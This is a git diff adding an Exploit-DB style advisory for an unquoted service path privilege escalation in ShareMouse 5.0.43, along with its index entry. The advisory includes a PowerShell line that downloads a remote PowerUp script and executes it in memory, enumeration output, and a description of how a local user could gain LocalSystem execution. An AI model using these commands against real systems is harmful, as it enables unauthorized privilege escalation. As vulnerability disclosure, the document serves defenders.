diff --git a/exploits/windows/local/48794.txt b/exploits/windows/local/48794.txt new file mode 100644 index 000000000..237f60d3c --- /dev/null +++ b/exploits/windows/local/48794.txt @@ -0,0 +1,25 @@ +# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path +# Discovery Date: 2020-09-08 +# Discovery by: Alan Lacerda (alacerda) +# Vendor Homepage: https://www.sharemouse.com/ +# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe +# Version: 5.0.43 +# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041 + +PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing); +PS > Invoke-AllChecks + +ServiceName : ShareMouse Service +Path : C:\Program Files (x86)\ShareMouse\smService.exe +StartName : LocalSystem +AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path + +PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName +AcceptStop DisplayName PathName StartName +TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem + +#Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 962e8dcae..b7adb44a2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10374,6 +10374,7 @@ id,file,description,date,author,type,platform,port 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows, 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows, 48790,exploits/windows/local/48790.txt,"Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path",2020-09-04,chipo,local,windows, +48794,exploits/windows/local/48794.txt,"ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path",2020-09-08,alacerda,local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,